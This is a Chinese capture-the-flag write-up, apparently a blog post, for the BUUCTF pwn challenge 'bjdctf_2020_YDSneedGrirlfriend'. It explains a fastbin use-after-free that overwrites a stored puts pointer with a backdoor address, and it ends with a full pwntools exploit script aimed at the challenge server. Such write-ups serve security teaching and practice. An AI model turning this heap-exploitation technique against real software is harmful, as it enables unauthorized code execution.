[BUUCTF]PWN——bjdctf_2020_YDSneedGrirlfriend(UAF)

bjdctf_2020_YDSneedGrirlfriend

  1. 例行检查,64位程序,开启了canary和nx
    在这里插入图片描述

  2. 试运行一下,看看大概的情况,常见的堆题的菜单
    在这里插入图片描述

  3. 64位ida载入,首先是检索字符串发现了程序中的后门函数,backdoor=0x400b9c
    在这里插入图片描述

  4. add_girlfriend()
    在这里插入图片描述
    del_girlfriend()
    在这里插入图片描述
    print_girlfriend()
    在这里插入图片描述

  5. 常见的uaf漏洞的利用方法,不清楚的详细看ctfwiki
    show函数会调用chunk里的puts输出chunk里的name,如果将调用puts函数的地方覆写成backdoor,那么在执行show调用puts的时候就转去执行backdoor了,这样就获取了shell

利用过程

  1. 首先在看一下add产生chunk的过程
  +-----------------+                       
   |   put           |                       
   +-----------------+                       
   |   content       |       size              
   +-----------------+------------------->+----------------+
                                          |     real       |
                                          |    content     |
                                          |                |
                                          +----------------+

申请两个chunk,看一下堆布局
在这里插入图片描述

  1. 然后释放两个chunk,现在fast bin chunk 中链表为 chunk1->chunk0
    在这里插入图片描述
    我们现在在调用一次add申请一个0x10大小chunk2,这样chunk2就能申请到chunk1的地址,之后申请的用来存放name的chunk就能申请到chunk0的地址。
    在这里插入图片描述
    如图标记,如图标记,一开始的时候,标记的chunk0里存储着puts函数的地址,我们现在要将puts改为backdoor
add(0x10,p64(backdoor))

修改成功,然后由于uaf的存在,show(0)就能调用backdoor了
在这里插入图片描述

完整exp

from pwn import *

p=remote('node3.buuoj.cn',26099)
#p=process('./bjdctf_2020_YDSneedGrirlfriend')
elf=ELF('./bjdctf_2020_YDSneedGrirlfriend')

def add(size,name):
	p.sendlineafter("Your choice :",'1')
	p.sendlineafter("Her name size is :",str(size))
	p.sendlineafter("Her name is :",name)


def dele(index):
	p.sendlineafter("Your choice :",'2')
	p.sendlineafter("Index :",str(index))

def show(index):
	p.sendlineafter("Your choice :",'3')
	p.sendlineafter("Index :",str(index))

backdoor=0x400b9c
add(0x20,'aaaa')
add(0x20,'bbbb')

dele(0)
dele(1)

add(0x10,p64(backdoor))

show(0)
p.interactive()

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值